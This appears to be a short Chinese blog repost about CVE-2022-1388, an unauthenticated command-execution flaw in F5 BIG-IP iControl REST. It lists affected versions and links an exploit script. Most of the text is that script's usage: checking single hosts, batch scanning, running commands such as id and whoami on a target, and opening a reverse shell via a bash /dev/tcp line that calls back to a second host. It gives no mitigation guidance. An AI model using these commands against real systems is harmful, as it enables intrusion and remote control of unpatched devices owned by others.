本文主要是介绍CVE-2022-1388:F5 BIG-IP iControl REST RCE,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
影响产品
- F5 BIG-IP 11.6.1 - 11.6.5
- F5 BIG-IP 12.1.0 - 12.1.6
- F5 BIG-IP 13.1.0 - 13.1.4
- F5 BIG-IP 14.1.0 - 14.1.4
- F5 BIG-IP 15.1.0 - 15.1.5
- F5 BIG-IP 16.1.0 - 16.1.2
漏洞影响
此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务
漏洞检测
检测脚本:https://github.com/Al1ex/CVE-2022-1388
基本用法
python3 CVE_2022_1388.py
漏洞检测
python3 CVE_2022_1388.py -v true -u https://192.168.17.200 
命令执行
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami
批量检测
python3 CVE_2022_1388.py -s true -f check.txt
反弹shell
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"
这篇关于CVE-2022-1388:F5 BIG-IP iControl REST RCE的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
